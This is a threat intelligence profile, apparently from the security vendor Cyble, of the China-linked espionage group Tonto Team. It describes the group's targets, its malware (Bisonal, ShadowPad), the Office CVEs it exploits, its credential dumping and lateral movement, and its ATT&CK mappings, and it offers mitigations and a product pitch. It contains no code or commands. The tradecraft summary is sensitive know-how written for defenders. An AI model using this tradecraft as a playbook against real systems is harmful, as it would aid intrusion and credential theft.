Overview 

Tonto Team is a long-running cyber espionage group assessed to operate on behalf of Chinese state interests, with links to the Shenyang Military Region Technical Reconnaissance Bureau (Unit 65017). Active since at least 2009, the group has sustained operations across Asia and parts of Eastern Europe, with consistent targeting government, defense, and strategic industry sectors. 

Operational activity has been observed in countries including India, Japan, South Korea, Taiwan, Mongolia, Russia, Switzerland, and the United States. The group prioritizes intelligence collection, with targeting aligned to geopolitical and economic interests, particularly in aerospace, defense, energy, mining, and technology sectors. 

Tonto Team maintains a stable malware ecosystem centered on backdoors such as Bisonal and ShadowPad, supported by commodity credential theft utilities and custom loaders. Campaigns rely heavily on spearphishing and exploitation of client-side vulnerabilities to establish initial access. 

Origin, Target Countries and Industries 

Tonto Team is attributed to China and is assessed to operate in alignment with state-sponsored intelligence objectives. Its long-term operational consistency, targeting patterns, and tooling ecosystem indicate affiliation with government-directed cyber espionage efforts within the Asia-Pacific region. 

The group primarily targets countries across Asia, including India, Japan, South Korea, Mongolia, and Taiwan, reflecting strong regional intelligence priorities. Activity has also been observed in China, Russia, and the United States, indicating broader strategic collection requirements tied to geopolitical, military, and economic interests. 

Tonto Team focuses on sectors that provide high-value intelligence and strategic advantage. Key targets include Aerospace & Defense, Government and Law Enforcement agencies, and IT & ITES organizations. The group also targets BFSI (Banking, Financial Services, and Insurance), Manufacturing, and Media & Entertainment sectors, likely to access.

Initial Access and Intrusion Workflow 

Tonto Team commonly initiates compromise through spearphishing emails containing malicious attachments, often in RTF or Office document formats. These files exploit known vulnerabilities in Microsoft Office and Equation Editor components to trigger code execution. 

Observed vulnerabilities include: 

• CVE-2017-11882  

• CVE-2018-0802  

• CVE-2018-8174  

• CVE-2019-0803  

Execution typically depends on user interaction, after which embedded scripts or shellcode deploy first-stage payloads. 

Post-exploitation activity includes: 

• PowerShell-based payload retrieval and execution  

• Deployment of lightweight loaders for second-stage malware  

• Use of Python-based tooling in select operations  

In some cases, the group has leveraged compromised Microsoft Exchange servers to deploy web shells for persistent access. This approach reflects a consistent reliance on proven exploit chains and user-driven execution rather than zero-day development. 

Malware Architecture and Operational Behavior 

Windows Tooling and Implants 

Tonto Team relies on a mix of custom backdoors and publicly available tools to maintain access and expand control within compromised environments. 

Core malware includes: 

• Bisonal RAT: Longstanding backdoor used for command execution, file transfer, and surveillance  

• ShadowPad: Modular backdoor with plugin-based architecture, often deployed via DLL sideloading  

Supporting tooling includes: 

• Credential dumpers such as Mimikatz, gsecdump, and LaZagne  

• Keyloggers and custom credential harvesters  

• Network reconnaissance utilities such as nbtscan  

Execution patterns include DLL search order hijacking, where legitimate signed binaries are abused to load malicious libraries. This technique reduces detection by blending malicious activity with trusted processes. 

Credential Access and Privilege Escalation 

Credential theft is a central component of Tonto Team operations. Tools such as Mimikatz and LaZagne are used to extract plaintext credentials, password hashes, and Kerberos tickets. 

Observed behaviors include: 

• Dumping LSASS memory for credential extraction  

• Harvesting stored application passwords  

• Capturing keystrokes via keylogging modules  

Privilege escalation is achieved through exploitation of known vulnerabilities (e.g., CVE-2019-0803, MS16-032), enabling administrative access prior to lateral movement. 

Lateral Movement and Internal Reconnaissance 

Following initial compromise, Tonto Team performs network discovery and lateral movement using a combination of native tools and exploits. 

Key techniques include: 

• Enumeration of local users and groups  

• Network share discovery via nbtscan  

• Exploitation of SMB vulnerabilities such as EternalBlue  

These actions allow the group to expand access across internal systems while identifying high-value assets. 

Command and Control Infrastructure 

Tonto Team maintains persistent communication with compromised hosts through external proxy infrastructure. Traffic is routed through intermediary servers to obscure origin and reduce attribution. 

Command-and-control activity includes: 

• Downloading additional payloads, including ShadowPad loaders  

• Remote execution of commands  

• Data staging prior to exfiltration  

Communication channels primarily rely on standard web protocols, enabling traffic to blend with normal network activity. 

Campaign Activity and Targeting Trends 

Tonto Team has conducted multiple named campaigns reflecting shifts in regional focus. 

• Operation “Bitter Biscuit”: Targeted Mongolian and Russian entities, indicating expanded geopolitical scope  

• HeartBeat Campaign (2012): Focused on South Korean government bodies, military organizations, and media outlets  

Across campaigns, targeting remains consistent with intelligence collection objectives, particularly in politically sensitive environments and industries tied to national infrastructure. 

Tooling and Malware Ecosystem 

Tonto Team’s tooling strategy combines custom implants with widely available post-exploitation frameworks. 

Frequently observed capabilities include: 

• Credential extraction and privilege escalation  

• Remote command execution  

• File exfiltration and staging  

• Persistence via web shells and DLL hijacking  

The continued reuse of established malware families alongside incremental tooling additions suggests an emphasis on operational reliability over rapid innovation. 

Conclusion 

Tonto Team continues to operate as a persistent espionage actor with more than a decade of activity. Its consistent use of spearphishing, known vulnerabilities, and modular backdoors enables sustained access to high-value targets across regions.  

Cyble assesses that such campaigns highlight the need for continuous, intelligence-led defense strategies powered by real-time visibility and proactive threat hunting. Strengthen your defenses with Cyble’s AI-powered threat intelligence. Leverage Cyble Blaze AI to predict, detect, and neutralize advanced threats before they impact your organization. 

Schedule a personalized demo to see how Cyble enables faster, smarter security operations at scale. 

Recommendations and Mitigation Strategies 

• Strengthen defenses against initial access vectors by filtering phishing emails and sandboxing attachments. Prioritize patching of widely exploited vulnerabilities in Microsoft Office and related components. 

• Restrict execution of scripting environments such as PowerShell and monitor for abnormal script activity. Enforce application control policies to prevent unauthorized DLL loading and sideloading behavior. 

• Deploy endpoint detection mechanisms capable of identifying credential dumping, LSASS access, and privilege escalation attempts. Monitor for use of tools such as Mimikatz and abnormal authentication patterns. 

• Segment networks to limit lateral movement and restrict SMB access where unnecessary. Monitor for exploitation attempts targeting SMB services. 

• Audit Exchange servers and external-facing systems for web shells and unauthorized access. Ensure timely patching and log analysis. 

• Implement multi-factor authentication across administrative accounts and remote access services to reduce the impact of credential compromise. 

MITRE ATT&CK Techniques Associated with Tonto Team 

• Spearphishing Attachment (T1566.001): Delivery of malicious Office and RTF documents. 

• PowerShell (T1059.001): Retrieval and execution of payloads. 

• Python (T1059.006): Use of Python-based tooling. 

• Exploitation for Client Execution (T1203): Abuse of Office vulnerabilities. 

• User Execution (T1204.002): Reliance on user interaction. 

• Web Shell (T1505.003): Deployment on compromised servers. 

• DLL Search Order Hijacking (T1574.001): Execution via trusted binaries. 

• Exploitation for Privilege Escalation (T1068): Use of known vulnerabilities. 

• OS Credential Dumping (T1003): Extraction of credentials. 

• Keylogging (T1056.001): Capture of user input. 

• Local Groups (T1069.001): Enumeration of user roles. 

• Network Share Discovery (T1135): Identification of shared resources. 

• Exploitation of Remote Services (T1210): Use of SMB exploits. 

• External Proxy (T1090.002): Traffic obfuscation via proxy infrastructure. 

• Ingress Tool Transfer (T1105): Delivery of additional payloads.